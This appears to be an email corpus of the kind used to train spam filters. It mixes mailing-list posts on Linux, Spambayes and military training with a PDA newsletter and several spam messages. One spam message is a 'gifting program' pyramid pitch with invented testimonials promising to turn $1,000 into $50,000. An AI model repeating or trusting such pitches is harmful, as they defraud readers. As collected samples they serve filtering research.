         &lt;li&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="-1"&gt;&lt;a href="http://www.handango.com/PlatformProductDetail.jsp?platformId=1&amp;amp;productType=2&amp;amp;sectionId=0&amp;amp;productId=30226&amp;amp;catalog=1&amp;amp;siteId=159" class="ReadMore"&gt;&lt;font color="#336699"&gt;Phrasebooks&lt;/font&gt;&lt;/a&gt;&lt;/font&gt; 
           &lt;a href="http://www.handango.com/PlatformSoftwareSection.jsp?siteId=159&amp;amp;platformId=1&amp;amp;special=&amp;amp;bySection=1&amp;amp;sectionId=231&amp;amp;catalog=1&amp;amp;title=Travel" class="ReadMore"&gt;&lt;br&gt;          	
 		&lt;b&gt;&lt;i&gt;&lt;font color="#336699"&gt;More in Travel...&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
 		&lt;/font&gt;
       &lt;/ol&gt;
       &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="-1"&gt;&lt;b&gt;Productivity&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
       &lt;ol&gt;
         &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="-1"&gt; 
         &lt;li&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="-1"&gt;&lt;a href="http://www.handango.com/PlatformProductDetail.jsp?platformId=1&amp;amp;productType=2&amp;amp;sectionId=0&amp;amp;productId=43645&amp;amp;catalog=1&amp;amp;siteId=159" class="ReadMore"&gt;&lt;font color="#336699"&gt;CutePack&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/li&gt;
         &lt;li&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="-1"&gt;&lt;a href="http://www.handango.com/PlatformProductDetail.jsp?platformId=1&amp;amp;productType=2&amp;amp;sectionId=0&amp;amp;productId=31485&amp;amp;catalog=1&amp;amp;siteId=159" class="ReadMore"&gt;&lt;font color="#336699"&gt;1 Button Launcher Pro&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/li&gt;
         &lt;li&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="-1"&gt;&lt;a href="http://www.handango.com/PlatformProductDetail.jsp?platformId=1&amp;amp;productType=2&amp;amp;sectionId=0&amp;amp;productId=30551&amp;amp;catalog=1&amp;amp;siteId=159" class="ReadMore"&gt;&lt;font color="#336699"&gt;QuickWrite 
           Professional&lt;/font&gt;&lt;/a&gt;&lt;/font&gt; &lt;a href="http://www.handango.com/PlatformSoftwareSection.jsp?siteId=159&amp;amp;platformId=1&amp;amp;special=&amp;amp;bySection=1&amp;amp;sectionId=1260&amp;amp;catalog=1&amp;amp;title=Personal+Productivity" class="ReadMore"&gt;&lt;br&gt;
           &lt;b&gt;&lt;i&gt;&lt;font color="#336699"&gt;More in Productivity...&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
         &lt;/font&gt; 
       &lt;/ol&gt;
       &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="-1"&gt;&lt;b&gt;Synchronization &amp; Installation&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
       &lt;ol&gt;
         &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="-1"&gt; 
         &lt;li&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="-1"&gt;&lt;a href="http://www.handango.com/PlatformProductDetail.jsp?platformId=1&amp;amp;productType=2&amp;amp;sectionId=0&amp;amp;productId=43447&amp;amp;catalog=1&amp;amp;siteId=159" class="ReadMore"&gt;&lt;font color="#336699"&gt;Installigent&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/li&gt;
         &lt;li&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="-1"&gt;&lt;a href="http://www.handango.com/PlatformProductDetail.jsp?platformId=1&amp;amp;productType=2&amp;amp;sectionId=0&amp;amp;productId=40495&amp;amp;catalog=1&amp;amp;siteId=159" class="ReadMore"&gt;&lt;font color="#336699"&gt;OneMail&lt;/font&gt;&lt;/a&gt;&lt;/font&gt; 
           &lt;a href="http://www.handango.com/PlatformSoftwareSection.jsp?siteId=159&amp;amp;platformId=1&amp;amp;bySection=1&amp;amp;special=&amp;amp;sectionId=132&amp;amp;catalog=1&amp;amp;title=Synchronization+&amp;amp;+Installation" class="ReadMore"&gt;&lt;br&gt;
           &lt;b&gt;&lt;i&gt;&lt;font color="#336699"&gt;More in Synchronization...&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/a&gt; 
         &lt;/li&gt;
         &lt;/font&gt;
       &lt;/ol&gt;
       &lt;/td&gt;
     &lt;td valign="top" height="271"&gt; 
       &lt;table width="100%" border="0" cellspacing="0" cellpadding="0" height="100%"&gt;
         &lt;tr&gt; 
           &lt;td background="http://www.handango.com/imgs/TheChampion2002/GrayLineVertical.gif" height="284"&gt; 
             &lt;table width="200" border="0" cellspacing="3" cellpadding="2" align="center" background="http://www.handango.com/imgs/Blank.gif"&gt;
               &lt;tr&gt; 
                 &lt;td background="http://www.handango.com/imgs/Blank.gif" class="Text" height="277"&gt; 
                   &lt;p class="TipNewsTitle" align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="-1" color="#336699"&gt;&lt;b&gt;&amp;quot;Keep 
                     Your Taps &lt;br&gt;
                     on Target" &lt;br&gt;
                     &lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
                   &lt;div align="center"&gt; 
                     &lt;p align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="-1"&gt;If 
                       your PDA screen taps sometimes don't seem to register correctly, 
                       use the built-in digitizer to easily re-adjust the settings.&lt;/font&gt;&lt;/p&gt;
                     &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="-1"&gt;Go 
                     to the main Applications screen and tap on Preferences. Choose 
                     'Digitizer' from the upper-right pull-down menu. Follow the 
                     simple on-screen instructions to realign your stylus with 
                     the screen.&lt;/font&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="-1"&gt; 
                     &lt;/font&gt;&lt;font size="-2" face="Verdana, Arial, Helvetica, sans-serif"&gt; 
                     &lt;/font&gt;&lt;/div&gt;
                   &lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td height="2"&gt;&lt;img src="http://www.handango.com/imgs/TheChampion2002/GrayLineBottom.gif" width="220" height="16"&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width="640" border="0" cellspacing="0" cellpadding="0" bgcolor="#FFFFFF"&gt;
   &lt;tr&gt; 
     &lt;td width="10" bgcolor="#6699CC" height="9"&gt;&lt;img src="http://www.handango.com/imgs/Blank.gif" width="10" height="8"&gt;&lt;/td&gt;
     &lt;td colspan="2" height="9"&gt;&lt;a name="4"&gt;&lt;/a&gt;&lt;img src="http://www.handango.com/imgs/TheChampion2002/ChampionsChoiceTitleBar2.gif" width="630" height="35"&gt;&lt;/td&gt;
     &lt;td rowspan="2" width="11" valign="middle"&gt;&amp;nbsp; &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td width="10" bgcolor="#6699CC" height="251"&gt;&lt;img src="http://www.handango.com/imgs/Blank.gif" width="10" height="8"&gt;&lt;/td&gt;
     &lt;td width="15" height="251"&gt;&lt;img src="http://www.handango.com/imgs/Blank.gif" width="10" height="8"&gt;&lt;/td&gt;
     &lt;td class="Text" height="251" valign="top" width="604"&gt; 
       &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="-1"&gt;&lt;b&gt;&lt;a href="http://www.chapura.com/handango" class="ReadMoreLarge"&gt;&lt;br&gt;
         &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="-1"&gt;&lt;b&gt;&lt;a href="http://www.handango.com/PlatformProductDetail.jsp?platformId=1&amp;amp;productType=2&amp;amp;sectionId=0&amp;amp;productId=43612&amp;amp;catalog=1&amp;amp;siteId=159" class="ReadMoreLarge"&gt;&lt;img width="163" height="164" border="1" hspace="10" vspace="10" bordercolor="#336699" src="http://www.handango.com/imgs/TheChampion2002/mileage.gif" align="right"&gt;&lt;/a&gt;&lt;/b&gt; 
         &lt;b&gt;&lt;a href="http://www.handango.com/PlatformProductDetail.jsp?platformId=1&amp;amp;productType=2&amp;amp;sectionId=0&amp;amp;productId=43612&amp;amp;catalog=1&amp;amp;siteId=159"&gt;&lt;font color="#336699"&gt;Rand 
         McNally Mileage Calculator&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
         &lt;/b&gt;&lt;/font&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="-1"&gt;Next 
         time you hit the road, know exactly how far you need to go. Together, 
         your Palm Powered PDA and the Rand McNally Mileage Calculator can deliver 
         half a million mileages between cities and attractions. &lt;/font&gt;&lt;/p&gt;
       &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="-1"&gt;Select two 
         points and get mileages with no waiting! Includes more than 800 cities, 
         including major cities in Mexico and Canada, plus more than 200 cool things 
         to see. &lt;b&gt;Only $9.99!&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
       &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="-1"&gt;&lt;a href="http://www.handango.com/PlatformProductDetail.jsp?platformId=1&amp;amp;productType=2&amp;amp;sectionId=0&amp;amp;productId=43612&amp;amp;catalog=1&amp;amp;siteId=159"&gt;&lt;font color="#CC0000"&gt;Click 
         here to purchase or download a free trial.&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
       &lt;hr&gt;
       &lt;div align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="-2"&gt;&lt;b&gt;Quick 
         links: &amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/b&gt;&lt;a href="http://www.handango.com/PlatformTopSoftware.jsp?siteId=159&amp;amp;navTitle=&amp;amp;topOption=3&amp;amp;productType=2&amp;amp;title=All+Best+Selling+Palm+OS%26reg%3B+Software&amp;amp;platformId=1"&gt;&lt;b&gt;&lt;font color="#CC0000"&gt;Palm 
         OS Best Sellers&lt;/font&gt;&lt;/b&gt;&lt;/a&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;a href="http://www.handango.com/PlatformTopSoftware.jsp?navTitle=Handango%27s+Picks&amp;amp;platformId=1&amp;amp;siteId=159&amp;amp;title=Handango%27s+Palm+OS+Picks&amp;amp;topOption=2&amp;amp;zsortParams=true&amp;amp;sortBy=name&amp;amp;order=asc"&gt;&lt;b&gt;&lt;font color="#CC0000"&gt;Handango's 
         Palm OS Picks&lt;/font&gt;&lt;/b&gt;&lt;/a&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;a href="http://www.handango.com/PlatformTopSoftware.jsp?navTitle=Essentials&amp;amp;platformId=1&amp;amp;siteId=159&amp;amp;title=Handango%27s+Palm+OS+Essentials&amp;amp;topOption=1&amp;amp;zsortParams=true&amp;amp;sortBy=name&amp;amp;order=asc"&gt;&lt;b&gt;&lt;font color="#CC0000"&gt;Palm OS Essentials&lt;/font&gt;&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;/div&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width="640" border="0" cellspacing="0" cellpadding="0" bgcolor="#FFFFFF"&gt;
   &lt;tr&gt; 
     &lt;td width="10" bgcolor="#6699CC" height="2"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td height="2"&gt;&lt;img src="http://www.handango.com/imgs/TheChampion2002/BlueDividerLine2.gif" width="630" height="5"&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width="640" border="0" cellspacing="0" cellpadding="0" bgcolor="#FFFFFF"&gt;
   &lt;tr&gt; 
     &lt;td width="10" bgcolor="#6699CC" height="2"&gt;&lt;img src="http://www.handango.com/imgs/blank.gif" width="10" height="8"&gt;&lt;/td&gt;
     &lt;td width="410" valign="bottom" height="2"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td width="400" valign="bottom" height="2" class="Text"&gt; 
       &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="-2"&gt;To unsubscribe 
         or modify your subscription, &lt;a href="http://www.handango.com/edit.jsp?siteId=159"&gt;click 
         here&lt;/a&gt;.&lt;br&gt;
         For advertising opportunities, email &lt;a href="mailto:champion@handango.com?subject=Advertise"&gt;champion@handango.com&lt;/a&gt;. 
         &lt;/font&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="-1" color="#336699"&gt;&lt;b&gt;&lt;img width="10" height="8" border="0" src="http://www.handango.com/imgs/TheChampion2002/openrate.gif"&gt;&lt;/b&gt;&lt;/font&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="-2"&gt; 
         &lt;a href="http://www.handango.com/PrivacyPolicy.jsp?siteId=159"&gt;&lt;img src="http://www.handango.com/imgs/TheChampion2002/CopyRightAndPrivacyLink.gif" width="399" height="30" usemap="#Map" border="0"&gt;&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
     &lt;/td&gt;
     &lt;td width="220" valign="bottom" height="2"&gt;&lt;a href="http://www.handango.com/home.jsp?siteId=159"&gt;&lt;img src="http://www.handango.com/imgs/TheChampion2002/HandangoLogo.gif" width="220" height="72" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 --1166300.1032541006905.JavaMail.Administrator.web5--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: The History of Medicine
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Forwarded-by: Nev Dull &lt;nev@sleepycat.com&gt;
 Forwarded-by: Gary Bianconi &lt;garyb@cmc.net&gt;
 The History of Medicine:
   2000 B.C. -- Here, eat this root.
   1000 A.D. -- That root is heathen. Say this prayer.
   1850 A.D. -- That prayer is superstition. Drink this potion.
   1940 A.D. -- That potion is snake oil. Swallow this pill.
   1985 A.D. -- That pill is ineffective. Take this antibiotic.
   2000 A.D. -- That antibiotic is artificial. Here, eat this root.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ADV: Extended Auto Warranties Here hvgxs
</t>
  </si>
  <si>
    <t xml:space="preserve">Protect your financial well-being.
 Purchase an Extended Auto Warranty for your Car today. 
 CLICK HERE for a FREE no obligation quote.
 http://ww3.onlineisbest.com/warranty/
 Car troubles always seem to happen at the worst possible time. 
 Protect yourself and your family with a 
 quality Extended Warranty for your car, truck, or SUV, 
 so that a large expense cannot hit you all at once. 
 We cover most vehicles with less than 150,000 miles.
 Buy DIRECT! Our prices are 40-60% LESS!
 We offer fair prices and prompt, toll-free claims service.  
 Get an Extended Warranty quote for your car today.
 Warranty plan also includes:
   1)   24-Hour Roadside Assistance.
   2)   Rental Benefit.
   3)   Trip Interruption Intervention.
   4)   Extended Towing Benefit.
 CLICK HERE for a FREE no obligation quote.
 http://ww3.onlineisbest.com/warranty/
 ---------------------------------------
 To easily remove your address from the list, go to: 
 http://ww3.onlineisbest.com/stopthemailplease/
 Please allow 48-72 hours for removal.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Toners and inkjet cartridges for less....          KYTAUZIRZPTF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</si>
  <si>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chrism
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 28 Aug 2002 17:45:49 -0700
 Brian McNett &lt;bmcnett@radparker.com&gt; wrote:
 &gt; The first court cases were actually concluded years ago. These 
 &gt; include many legal precedents which are used to protect the 
 &gt; rights of ISPs to block mail, and to terminate service to 
 &gt; spammers.
 Yeah, but these would be different cases relating to copyright infringements,
 not about ISP's blocking mail or not.
 ---
 Lars Hansson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</si>
  <si>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Philip Reynolds wrote:
 &gt; Inn Share's [shareinnn@yahoo.com] 22 lines of wisdom included:
 &gt; &gt; 
 &gt; &gt; Hi,all:
 &gt; &gt; 
 &gt; &gt; Does anyone know how to list the biggest file in my
 &gt; &gt; root directory?or the second biggest ..etc...
 &gt; &gt; 
 &gt; &gt; Because I want to find out what is the reason cause my
 &gt; &gt; root all most full.
 &gt; 
 &gt; $ find /dir -name \*  | xargs du -s | sort -n
 &gt; 
 &gt; Smallest files are listed first with the largest at the end. So if
 &gt; you want to get the 5 largest files, pipe through tail.
 Adding -r to the sort options, and piping through head instead,
 might be a better idea. tail needs to read teh whole buffer, head
 only reads the first n lines.
 Cheers,
 Dave.
 -- 
        David Neary,
     Marseille, France
   E-Mail: bolsh@gimp.org
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Robbie's 80m deal puts EMI on new path
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-6,8572787,215/
 Date: 2002-10-05T03:05:33+01:00
 *Arts:* Record giant's move highlights changing situation at a time when 
 classical market is faltering.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Spambayes] stack.pop() ate my multipart message
</t>
  </si>
  <si>
    <t xml:space="preserve">I've been running hammie on all my incoming messages, and I noticed that
 multipart/alternative messages are totally hosed: they have no content,
 just the MIME boundaries.  For instance, the following message:
 ------------------------------8&lt;------------------------------
 From: somebody &lt;someone@somewhere.org&gt;
 To: neale@woozle.org
 Subject: Booga
 Content-type: multipart/alternative; boundary="snot"
 This is a multi-part message in MIME format.
 --snot
 Content-type: text/plain; charset=iso-8859-1
 Content-transfer-encoding: 7BIT
 Hi there.
 --snot
 Content-type: text/html; charset=iso-8859-1
 Content-transfer-encoding: 7BIT
 &lt;pre&gt;Hi there.&lt;/pre&gt;
 --snot--
 ------------------------------8&lt;------------------------------
 Comes out like this:
 ------------------------------8&lt;------------------------------
 From: somebody &lt;someone@somewhere.org&gt;
 To: neale@woozle.org
 Subject: Booga
 Content-type: multipart/alternative; boundary="snot"
 X-Hammie-Disposition: No; 0.74; [unrelated gar removed]
 This is a multi-part message in MIME format.
 --snot
 --snot--
 ------------------------------8&lt;------------------------------
 I'm using "Python 2.3a0 (#1, Sep  9 2002, 22:56:24)".
 I've fixed it with the following patch to Tim's tokenizer, but I have to
 admit that I'm baffled as to why it works.  Maybe there's some subtle
 interaction between generators and lists that I can't understand.  Or
 something.  Being as I'm baffled, I don't imagine any theory I come up
 with will be anywhere close to reality.
 In any case, be advised that (at least for me) hammie will eat
 multipart/alternative messages until this patch is applied.  The patch
 seems rather bogus though, so I'm not checking it in, in the hope that
 there's a better fix I just wasn't capable of discovering :)
 ------------------------------8&lt;------------------------------
 Index: tokenizer.py
 ===================================================================
 RCS file: /cvsroot/spambayes/spambayes/tokenizer.py,v
 retrieving revision 1.15
 diff -u -r1.15 tokenizer.py
 --- tokenizer.py	10 Sep 2002 18:15:49 -0000	1.15
 +++ tokenizer.py	11 Sep 2002 05:01:16 -0000
 @@ -1,3 +1,4 @@
 +#! /usr/bin/env python
  """Module to tokenize email messages for spam filtering."""
  import email
 @@ -507,7 +508,8 @@
              htmlpart = textpart = None
              stack = part.get_payload()
              while stack:
 -                subpart = stack.pop()
 +                subpart = stack[0]
 +                stack = stack[1:]
                  ctype = subpart.get_content_type()
                  if ctype == 'text/plain':
                      textpart = subpart
 ------------------------------8&lt;------------------------------
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: What's cool about doing nothing
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 2002-07-31 at 15:16, Elias Sinderson wrote:
 &gt; Heh. Never mind the perfectly good desert in the southwest, right? Or is 
 &gt; that area too hot for desert warfare training? I'll never understand.
 The primary desert warfare facilities and schools ARE in the Southwest,
 most notably Fort Irwin deep in the Mojave/Anza Borrego (the
 headquarters and core training facilities for all things desert warfare
 related), and have been for a long time. There are two reasons that
 immediately come to mind as to why they do not use the Fort Irwin,
 Edwards AFB, and other expanses of desert that they have traditionally
 used for desert warfare training and exercises.  
 The first is logistical: Virtually all the mechanized infantry units are
 located east of the Rockies, and it must be very expensive to move
 entire heavy combat divisions a couple thousand miles every time they
 want to run training exercises.  This is particularly true since so much
 of our military is made up of reserve components these days, meaning
 that you can't move the soldiers to where the training facilities are.
 The second is environmental lawsuits and pending judicial action and
 injunctions. The desert training facilities in the Southwest deserts
 have been aggressively assaulted by environmental organizations who are
 making the case that heavy mechanized units zipping back and forth
 across the deep desert endanger the desert tortoise and a bunch of other
 theoretically endangered species that are concentrated in the southwest
 deserts. The ability of the military to use the desert facilities has
 been significantly impeded these days while all the lawsuits and whatnot
 with the various environmental groups are being sorted out.
 -James Rogers
  jamesr@best.com
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Fwd: Accepting Credit Cards (Faq) [suhdn]
</t>
  </si>
  <si>
    <t xml:space="preserve">
  If you want a your own no hassle Credit Card Merchant Account
  with absolutely no setup fees. Read on... we have a 95% 
  approval rate!
  Good credit, bad credit, no credit -- no a problem! 
  This Means *You*, yes *YOU* can be accepting Credit Cards TODAY!
  including:
  Visa, MasterCard, American Express and Discover, Debit cards, 
  ATM and Check by fax! 
  Anyone is welcome:
  Internet Auctions!, Websites!, Retail stores, Home Business Anyone!
  If you would like to speak to someone right now, we would be more
  then happy to answer any questions you might have, please provide:
  Your Phone Number:  (  )   -
  Best time to call:
  You will also have the ability to accept E-checks over the Internet
  Did I mention that everything runs on the most secure servers in 
  the world! As well you have the ability to do all of this over 
  the phone for those customers who have yet to trust the security 
  on the Internet!
  You will never miss another sale!
  We can handle ANY business and client type!
  If you already have a merchant account we can lower your rates
  substantially with the most competitive rates in the industry and
  state of the art equipment and software. We will tailor a program
  to fit your budget and you wont pay a premium for this incredible
  service!
  Please help your business grow, you deserve it!
  How much longer can you accept checks? 
  Don't lose your customers to your competition!
  We are here to help, We can provide you with the information you 
  need to make a sound decision, please provide:
  Your Phone Number:  (  )   -
  Best time to call:
  (All information is kept securely and will never be shared with 
  a third party)
  If you wish to be removed from our mailing list, please reply to
  this email with the subject "Remove" and you will not receive
  future emails from our company.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: Your Bank Account Information 
</t>
  </si>
  <si>
    <t xml:space="preserve">A POWERHOUSE GIFTING PROGRAM You Don't Want To Miss! 
   GET IN WITH THE FOUNDERS! 
 The MAJOR PLAYERS are on This ONE
 For ONCE be where the PlayerS are
 This is YOUR Private Invitation
 EXPERTS ARE CALLING THIS THE FASTEST WAY 
 TO HUGE CASH FLOW EVER CONCEIVED
 Leverage $1,000 into $50,000 Over and Over Again
 THE QUESTION HERE IS:
 YOU EITHER WANT TO BE WEALTHY 
 OR YOU DON'T!!!
 WHICH ONE ARE YOU?
 I am tossing you a financial lifeline and for your sake I 
 Hope you GRAB onto it and hold on tight For the Ride of youR life!
 Testimonials
 Hear what average people are doing their first few days:
 We've received 8,000 in 1 day and we are doing that over and over again!' Q.S. in AL
  I'm a single mother in FL and I've received 12,000 in the last 4 days. D. S. in FL
 I was not sure about this when I sent off my $1,000 pledge, but I got back $2,000 the very next day! L.L. in KY
 I didn't have the money, so I found myself a partner to work this with. We have received $4,000 over the last 2 days. 
 I think I made the right decision; don't you? K. C. in FL
 I pick up $3,000 my first day and I  they gave me free leads and all the training, you can too! J.W. in CA
 ANNOUNCING: We will CLOSE your sales for YOU! And Help you get a Fax Blast IMMEDIATELY Upon Your Entry!!!    YOU Make the MONEY!!!
 FREE LEADS!!! TRAINING!!!
 $$DON'T WAIT!!! CALL NOW $$
 FAX BACK TO: 1-800-421-6318 OR Call 1-800-896-6568 
 Name__________________________________Phone___________________________________________
 Fax_____________________________________Email____________________________________________
 Best Time To Call_________________________Time Zone________________________________________
 This message is sent in compliance of the new e-mail bill. "Per Section 301, Paragraph (a)(2)(C) of S. 1618, further transmissions by the sender of this email may be stopped, at no cost to you, by sending a reply to this email address with the word "REMOVE" in the subject line. Errors, omissions, and exceptions excluded.
 This is NOT spam! I have compiled this list from our Replicate Database, relative to Seattle Marketing Group, The Gigt, or Turbo Team for the sole purpose of these communications. Your continued inclusion is ONLY by your gracious permission. If you wish to not receive this mail from me, please send an email to tesrewinter@yahoo.com with "Remove" in the subject and you will be deleted immediately.
</t>
  </si>
  <si>
    <t xml:space="preserve">bitbitch@magnesium.net wrote:
  &gt; Well Beberg, unless you're really into Anime and actually hold true
  &gt; that dead people can send email, I think Geege's subject is just
  &gt; dandy.
 Funny you should mention that, as I just came back from refilling
 the green coolant in my Navi.
  &gt; (bonus FoRK points if Adam knows what anime i'm refering to)
 I guess I don't get any points, do I? No, didn't think so.
 - Joe
 P.S. We've just started watching Boogiepop Phantom...
 -- 
 The Combatant State is your father and your mother, your only
 protector, the totality of your interests. No discipline can
 be stern enough for the man who denies that by word or deed.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: YOU TO CAN MAKE---THOUSANDS PER WEEK----RUNNING YOUR OWN  FREE WEB BUSINESS
</t>
  </si>
  <si>
    <t xml:space="preserve">
 This is a multipart MIME message.
 --= Multipart Boundary 0802010258
 Content-Type: text/plain; charset="iso-8859-1"
 Content-Transfer-Encoding: 7bit
               to remove your address per fed law
               print remove in subject line to--------
               route69@biker.com
 --= Multipart Boundary 0802010258
 Content-Type: application/octet-stream;
 	name="talkcity--page.01.html"
 Content-Transfer-Encoding: base64
 Content-Disposition: attachment;
 	filename="talkcity--page.01.html"
 PCEtLQ0KdGVtcGxhdGVzL2hvbWV0b29sL3BhZ2VzL1RDQ2xhc3NpY0Jpby50
 eHQNCi0tPg0KPEhUTUw+IDwhLS0gVGFsa0NpdHkgVENDbGFzc2ljQmlvLnR4
 dDogdmVyc2lvbiAxLCAxMyBBdWd1c3QgMTk5OS4gLS0+DQo8IS0tIFRlbXBs
 YXRlIHNjcmlwdGluZyBsYW5ndWFnZSwgVmVyc2lvbiAxLjAgLS0+DQo8SEVB
 RD4NCjxUSVRMRT5XZWxjb21lIHRvIGJpbGwgcmVkbW9uZCB3ZWIgZW50ZXJw
 cmlzZXM8L1RJVExFPg0KPE1FVEEgTkFNRT0iREVTQ1JJUFRJT04iIENPTlRF
 TlQ9ImJlbG93IHdob2xlc2FsZSBwcmljZXMgZm9yIGFsbCI+DQo8TUVUQSBO
 QU1FPSJLRVlXT1JEUyIgQ09OVEVOVD0ic3BvdGluZyBnb29kcyBzdG9yZXMs
 IGF1dG8gZWxlY3Ryb25pY3Mgc3RvcmVzLHByb2dyYW1zDQ0KdGhhdCBwYXkg
 eW91IHRvIHN1cmYgdGhlIHdlYiBtYWtlIGFuIGV4dHJhICQzNTAuMDAgcGVy
 IG1vbnRoIj4NCjxCQVNFIGhyZWY9Imh0dHA6Ly9ob21lLnRhbGtjaXR5LmNv
 bS9TcGFya3BsdWdTdC9iaWxyZWQvMDEuaHRtbCI+DQo8L0hFQUQ+DQoNCg0K
 PEJPRFkgQkdDT0xPUj0iI0NDQ0NDQyINCiAgICAgICAgIFRFWFQ9IiMwMDAw
 NjYiDQogICAgICAgICBMSU5LPSIjMDAzMzY2Ig0KICAgICAgICBWTElOSz0i
 IzMzNjY5OSINCiAgICAgICAgQUxJTks9IiMwMDAwOTkiDQogICAgICBiYWNr
 Z3JvdW5kPSJodHRwOi8vaG9tZS50YWxrY2l0eS5jb20vaW1hZ2VzL3N0eWxl
 L1NhaWxib2F0L2JhY2tncm91bmQuanBnIj4NCg0KDQo8Q0VOVEVSPg0KDQoN
 Cg0KPCEtLQ0KdGVtcGxhdGVzL2hvbWV0b29sL3BhZ2VzL0VkaXREaXNwSW5j
 LnR4dA0KLS0+DQoNCg0KDQoNCjxCPjxoMj5DbGljayBvbiAiQmFjayIgdG8g
 cmV0dXJuIHRvIHByZXZpb3VzIHBhZ2U8L2gyPjwvQj4NCjxmb3JtIE1FVEhP
 RD0iUE9TVCIgQUNUSU9OPSJodHRwOi8vai50YWxrY2l0eS5jb20vaHQvUGFn
 ZURpc3BsYXkiPg0KPElOUFVUIFRZUEU9U1VCTUlUIE5BTUU9IlN1Ym1pdCIg
 VkFMVUU9IkJhY2siPg0KPGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9InBhZ2Vf
 aWQiIHZhbHVlPSI0MjgxNzA0Ij4NCjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1l
 PSJjYWxsZXIiIHZhbHVlPSJodC9TaXRlTWFuYWdlciI+DQo8L2Zvcm0+DQo8
 aHI+DQo8UD4NCg0KPCEtLQ0KQ0xPU0UgdGVtcGxhdGVzL2hvbWV0b29sL3Bh
 Z2VzL0VkaXREaXNwSW5jLnR4dA0KLS0+DQoNCg0KPCEtLSBwYWdlIHByb3Bl
 cnRpZXMgLS0+DQoNCjxQPg0KDQo8cD48Qj48Rk9OVCBTSVpFPSIrMiI+V2Vs
 Y29tZSB0byBiaWxsIHJlZG1vbmQgd2ViIGVudGVycHJpc2VzPC9GT05UPjwv
 Qj48UD4NCg0KDQo8VEFCTEUgQk9SREVSPTAgQ0VMTFNQQUNJTkc9MSBDRUxM
 UEFERElORz0wIFdJRFRIPTYwMD4NCjxUUj48VEQgYmdjb2xvcj0jMDAwMDY2
 IEhFSUdIVD0iMiI+PElNRyBTUkM9Imh0dHA6Ly9ob21lLnRhbGtjaXR5LmNv
